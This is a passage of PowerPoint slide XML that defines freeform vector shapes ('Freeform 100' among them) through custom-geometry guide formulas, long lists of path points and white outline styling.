            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3380" y="2753"/>
                <a:ext cx="162" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 208 h 220"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 191 h 220"/>
                  <a:gd name="T4" fmla="*/ 0 w 162"/>
                  <a:gd name="T5" fmla="*/ 169 h 220"/>
                  <a:gd name="T6" fmla="*/ 0 w 162"/>
                  <a:gd name="T7" fmla="*/ 160 h 220"/>
                  <a:gd name="T8" fmla="*/ 0 w 162"/>
                  <a:gd name="T9" fmla="*/ 148 h 220"/>
                  <a:gd name="T10" fmla="*/ 15 w 162"/>
                  <a:gd name="T11" fmla="*/ 126 h 220"/>
                  <a:gd name="T12" fmla="*/ 26 w 162"/>
                  <a:gd name="T13" fmla="*/ 125 h 220"/>
                  <a:gd name="T14" fmla="*/ 30 w 162"/>
                  <a:gd name="T15" fmla="*/ 121 h 220"/>
                  <a:gd name="T16" fmla="*/ 37 w 162"/>
                  <a:gd name="T17" fmla="*/ 116 h 220"/>
                  <a:gd name="T18" fmla="*/ 45 w 162"/>
                  <a:gd name="T19" fmla="*/ 114 h 220"/>
                  <a:gd name="T20" fmla="*/ 63 w 162"/>
                  <a:gd name="T21" fmla="*/ 114 h 220"/>
                  <a:gd name="T22" fmla="*/ 80 w 162"/>
                  <a:gd name="T23" fmla="*/ 96 h 220"/>
                  <a:gd name="T24" fmla="*/ 107 w 162"/>
                  <a:gd name="T25" fmla="*/ 64 h 220"/>
                  <a:gd name="T26" fmla="*/ 84 w 162"/>
                  <a:gd name="T27" fmla="*/ 61 h 220"/>
                  <a:gd name="T28" fmla="*/ 49 w 162"/>
                  <a:gd name="T29" fmla="*/ 49 h 220"/>
                  <a:gd name="T30" fmla="*/ 41 w 162"/>
                  <a:gd name="T31" fmla="*/ 43 h 220"/>
                  <a:gd name="T32" fmla="*/ 31 w 162"/>
                  <a:gd name="T33" fmla="*/ 31 h 220"/>
                  <a:gd name="T34" fmla="*/ 28 w 162"/>
                  <a:gd name="T35" fmla="*/ 23 h 220"/>
                  <a:gd name="T36" fmla="*/ 33 w 162"/>
                  <a:gd name="T37" fmla="*/ 13 h 220"/>
                  <a:gd name="T38" fmla="*/ 36 w 162"/>
                  <a:gd name="T39" fmla="*/ 8 h 220"/>
                  <a:gd name="T40" fmla="*/ 44 w 162"/>
                  <a:gd name="T41" fmla="*/ 16 h 220"/>
                  <a:gd name="T42" fmla="*/ 50 w 162"/>
                  <a:gd name="T43" fmla="*/ 23 h 220"/>
                  <a:gd name="T44" fmla="*/ 54 w 162"/>
                  <a:gd name="T45" fmla="*/ 25 h 220"/>
                  <a:gd name="T46" fmla="*/ 61 w 162"/>
                  <a:gd name="T47" fmla="*/ 25 h 220"/>
                  <a:gd name="T48" fmla="*/ 67 w 162"/>
                  <a:gd name="T49" fmla="*/ 22 h 220"/>
                  <a:gd name="T50" fmla="*/ 77 w 162"/>
                  <a:gd name="T51" fmla="*/ 18 h 220"/>
                  <a:gd name="T52" fmla="*/ 86 w 162"/>
                  <a:gd name="T53" fmla="*/ 21 h 220"/>
                  <a:gd name="T54" fmla="*/ 94 w 162"/>
                  <a:gd name="T55" fmla="*/ 18 h 220"/>
                  <a:gd name="T56" fmla="*/ 101 w 162"/>
                  <a:gd name="T57" fmla="*/ 13 h 220"/>
                  <a:gd name="T58" fmla="*/ 108 w 162"/>
                  <a:gd name="T59" fmla="*/ 14 h 220"/>
                  <a:gd name="T60" fmla="*/ 119 w 162"/>
                  <a:gd name="T61" fmla="*/ 10 h 220"/>
                  <a:gd name="T62" fmla="*/ 126 w 162"/>
                  <a:gd name="T63" fmla="*/ 12 h 220"/>
                  <a:gd name="T64" fmla="*/ 137 w 162"/>
                  <a:gd name="T65" fmla="*/ 10 h 220"/>
                  <a:gd name="T66" fmla="*/ 150 w 162"/>
                  <a:gd name="T67" fmla="*/ 3 h 220"/>
                  <a:gd name="T68" fmla="*/ 158 w 162"/>
                  <a:gd name="T69" fmla="*/ 1 h 220"/>
                  <a:gd name="T70" fmla="*/ 161 w 162"/>
                  <a:gd name="T71" fmla="*/ 3 h 220"/>
                  <a:gd name="T72" fmla="*/ 159 w 162"/>
                  <a:gd name="T73" fmla="*/ 11 h 220"/>
                  <a:gd name="T74" fmla="*/ 160 w 162"/>
                  <a:gd name="T75" fmla="*/ 20 h 220"/>
                  <a:gd name="T76" fmla="*/ 156 w 162"/>
                  <a:gd name="T77" fmla="*/ 27 h 220"/>
                  <a:gd name="T78" fmla="*/ 156 w 162"/>
                  <a:gd name="T79" fmla="*/ 38 h 220"/>
                  <a:gd name="T80" fmla="*/ 146 w 162"/>
                  <a:gd name="T81" fmla="*/ 58 h 220"/>
                  <a:gd name="T82" fmla="*/ 139 w 162"/>
                  <a:gd name="T83" fmla="*/ 66 h 220"/>
                  <a:gd name="T84" fmla="*/ 133 w 162"/>
                  <a:gd name="T85" fmla="*/ 80 h 220"/>
                  <a:gd name="T86" fmla="*/ 126 w 162"/>
                  <a:gd name="T87" fmla="*/ 96 h 220"/>
                  <a:gd name="T88" fmla="*/ 118 w 162"/>
                  <a:gd name="T89" fmla="*/ 108 h 220"/>
                  <a:gd name="T90" fmla="*/ 104 w 162"/>
                  <a:gd name="T91" fmla="*/ 127 h 220"/>
                  <a:gd name="T92" fmla="*/ 85 w 162"/>
                  <a:gd name="T93" fmla="*/ 148 h 220"/>
                  <a:gd name="T94" fmla="*/ 56 w 162"/>
                  <a:gd name="T95" fmla="*/ 167 h 220"/>
                  <a:gd name="T96" fmla="*/ 43 w 162"/>
                  <a:gd name="T97" fmla="*/ 178 h 220"/>
                  <a:gd name="T98" fmla="*/ 30 w 162"/>
                  <a:gd name="T99" fmla="*/ 191 h 220"/>
                  <a:gd name="T100" fmla="*/ 13 w 162"/>
                  <a:gd name="T101" fmla="*/ 210 h 220"/>
                  <a:gd name="T102" fmla="*/ 10 w 162"/>
                  <a:gd name="T103" fmla="*/ 218 h 22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62"/>
                  <a:gd name="T157" fmla="*/ 0 h 220"/>
                  <a:gd name="T158" fmla="*/ 162 w 162"/>
                  <a:gd name="T159" fmla="*/ 220 h 220"/>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62" h="220">
                    <a:moveTo>
                      <a:pt x="9" y="220"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="220"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36368" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3698" y="2285"/>
                <a:ext cx="227" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 227"/>
                  <a:gd name="T1" fmla="*/ 148 h 172"/>
                  <a:gd name="T2" fmla="*/ 20 w 227"/>
                  <a:gd name="T3" fmla="*/ 137 h 172"/>
                  <a:gd name="T4" fmla="*/ 7 w 227"/>
                  <a:gd name="T5" fmla="*/ 133 h 172"/>
                  <a:gd name="T6" fmla="*/ 3 w 227"/>
                  <a:gd name="T7" fmla="*/ 114 h 172"/>
                  <a:gd name="T8" fmla="*/ 7 w 227"/>
                  <a:gd name="T9" fmla="*/ 95 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 227"/>
                  <a:gd name="T11" fmla="*/ 91 h 172"/>
                  <a:gd name="T12" fmla="*/ 4 w 227"/>
                  <a:gd name="T13" fmla="*/ 81 h 172"/>
                  <a:gd name="T14" fmla="*/ 11 w 227"/>
                  <a:gd name="T15" fmla="*/ 60 h 172"/>
                  <a:gd name="T16" fmla="*/ 14 w 227"/>
                  <a:gd name="T17" fmla="*/ 56 h 172"/>
                  <a:gd name="T18" fmla="*/ 32 w 227"/>
                  <a:gd name="T19" fmla="*/ 61 h 172"/>
                  <a:gd name="T20" fmla="*/ 42 w 227"/>
                  <a:gd name="T21" fmla="*/ 57 h 172"/>
                  <a:gd name="T22" fmla="*/ 47 w 227"/>
                  <a:gd name="T23" fmla="*/ 49 h 172"/>
                  <a:gd name="T24" fmla="*/ 65 w 227"/>
                  <a:gd name="T25" fmla="*/ 40 h 172"/>
                  <a:gd name="T26" fmla="*/ 78 w 227"/>
                  <a:gd name="T27" fmla="*/ 22 h 172"/>
                  <a:gd name="T28" fmla="*/ 88 w 227"/>
                  <a:gd name="T29" fmla="*/ 20 h 172"/>
                  <a:gd name="T30" fmla="*/ 104 w 227"/>
                  <a:gd name="T31" fmla="*/ 22 h 172"/>
                  <a:gd name="T32" fmla="*/ 117 w 227"/>
                  <a:gd name="T33" fmla="*/ 28 h 172"/>
                  <a:gd name="T34" fmla="*/ 119 w 227"/>
                  <a:gd name="T35" fmla="*/ 30 h 172"/>
                  <a:gd name="T36" fmla="*/ 131 w 227"/>
                  <a:gd name="T37" fmla="*/ 23 h 172"/>
                  <a:gd name="T38" fmla="*/ 141 w 227"/>
                  <a:gd name="T39" fmla="*/ 25 h 172"/>
                  <a:gd name="T40" fmla="*/ 144 w 227"/>
                  <a:gd name="T41" fmla="*/ 19 h 172"/>
                  <a:gd name="T42" fmla="*/ 151 w 227"/>
                  <a:gd name="T43" fmla="*/ 18 h 172"/>
                  <a:gd name="T44" fmla="*/ 157 w 227"/>
                  <a:gd name="T45" fmla="*/ 14 h 172"/>
                  <a:gd name="T46" fmla="*/ 160 w 227"/>
                  <a:gd name="T47" fmla="*/ 4 h 172"/>
                  <a:gd name="T48" fmla="*/ 166 w 227"/>
                  <a:gd name="T49" fmla="*/ 0 h 172"/>
                  <a:gd name="T50" fmla="*/ 170 w 227"/>
                  <a:gd name="T51" fmla="*/ 10 h 172"/>
                  <a:gd name="T52" fmla="*/ 174 w 227"/>
                  <a:gd name="T53" fmla="*/ 13 h 172"/>
                  <a:gd name="T54" fmla="*/ 174 w 227"/>
                  <a:gd name="T55" fmla="*/ 28 h 172"/>
                  <a:gd name="T56" fmla="*/ 178 w 227"/>
                  <a:gd name="T57" fmla="*/ 33 h 172"/>
                  <a:gd name="T58" fmla="*/ 190 w 227"/>
                  <a:gd name="T59" fmla="*/ 28 h 172"/>
                  <a:gd name="T60" fmla="*/ 205 w 227"/>
                  <a:gd name="T61" fmla="*/ 20 h 172"/>
                  <a:gd name="T62" fmla="*/ 206 w 227"/>
                  <a:gd name="T63" fmla="*/ 23 h 172"/>
                  <a:gd name="T64" fmla="*/ 219 w 227"/>
                  <a:gd name="T65" fmla="*/ 21 h 172"/>
                  <a:gd name="T66" fmla="*/ 226 w 227"/>
                  <a:gd name="T67" fmla="*/ 24 h 172"/>
                  <a:gd name="T68" fmla="*/ 223 w 227"/>
                  <a:gd name="T69" fmla="*/ 26 h 172"/>
                  <a:gd name="T70" fmla="*/ 220 w 227"/>
                  <a:gd name="T71" fmla="*/ 28 h 172"/>
                  <a:gd name="T72" fmla="*/ 212 w 227"/>
                  <a:gd name="T73" fmla="*/ 32 h 172"/>
                  <a:gd name="T74" fmla="*/ 189 w 227"/>
                  <a:gd name="T75" fmla="*/ 33 h 172"/>
                  <a:gd name="T76" fmla="*/ 180 w 227"/>
                  <a:gd name="T77" fmla="*/ 40 h 172"/>
                  <a:gd name="T78" fmla="*/ 173 w 227"/>
                  <a:gd name="T79" fmla="*/ 46 h 172"/>
                  <a:gd name="T80" fmla="*/ 176 w 227"/>
                  <a:gd name="T81" fmla="*/ 54 h 172"/>
                  <a:gd name="T82" fmla="*/ 178 w 227"/>
                  <a:gd name="T83" fmla="*/ 64 h 172"/>
                  <a:gd name="T84" fmla="*/ 169 w 227"/>
                  <a:gd name="T85" fmla="*/ 74 h 172"/>
                  <a:gd name="T86" fmla="*/ 170 w 227"/>
                  <a:gd name="T87" fmla="*/ 83 h 172"/>
                  <a:gd name="T88" fmla="*/ 159 w 227"/>
                  <a:gd name="T89" fmla="*/ 86 h 172"/>
                  <a:gd name="T90" fmla="*/ 152 w 227"/>
                  <a:gd name="T91" fmla="*/ 89 h 172"/>
                  <a:gd name="T92" fmla="*/ 156 w 227"/>
                  <a:gd name="T93" fmla="*/ 99 h 172"/>
                  <a:gd name="T94" fmla="*/ 149 w 227"/>
                  <a:gd name="T95" fmla="*/ 102 h 172"/>
                  <a:gd name="T96" fmla="*/ 142 w 227"/>
                  <a:gd name="T97" fmla="*/ 109 h 172"/>
                  <a:gd name="T98" fmla="*/ 139 w 227"/>
                  <a:gd name="T99" fmla="*/ 127 h 172"/>
                  <a:gd name="T100" fmla="*/ 128 w 227"/>
                  <a:gd name="T101" fmla="*/ 128 h 172"/>
                  <a:gd name="T102" fmla="*/ 117 w 227"/>
                  <a:gd name="T103" fmla="*/ 132 h 172"/>
                  <a:gd name="T104" fmla="*/ 110 w 227"/>
                  <a:gd name="T105" fmla="*/ 138 h 172"/>
                  <a:gd name="T106" fmla="*/ 99 w 227"/>
                  <a:gd name="T107" fmla="*/ 142 h 172"/>
                  <a:gd name="T108" fmla="*/ 93 w 227"/>
                  <a:gd name="T109" fmla="*/ 155 h 172"/>
                  <a:gd name="T110" fmla="*/ 90 w 227"/>
                  <a:gd name="T111" fmla="*/ 165 h 172"/>
                  <a:gd name="T112" fmla="*/ 67 w 227"/>
                  <a:gd name="T113" fmla="*/ 170 h 172"/>
                  <a:gd name="T114" fmla="*/ 48 w 227"/>
                  <a:gd name="T115" fmla="*/ 170 h 172"/>
                  <a:gd name="T116" fmla="*/ 31 w 227"/>
                  <a:gd name="T117" fmla="*/ 171 h 172"/>
                  <a:gd name="T118" fmla="*/ 12 w 227"/>
                  <a:gd name="T119" fmla="*/ 166 h 172"/>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227"/>
                  <a:gd name="T181" fmla="*/ 0 h 172"/>
                  <a:gd name="T182" fmla="*/ 227 w 227"/>
                  <a:gd name="T183" fmla="*/ 172 h 172"/>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227" h="172">
                    <a:moveTo>
                      <a:pt x="6" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="28"/>
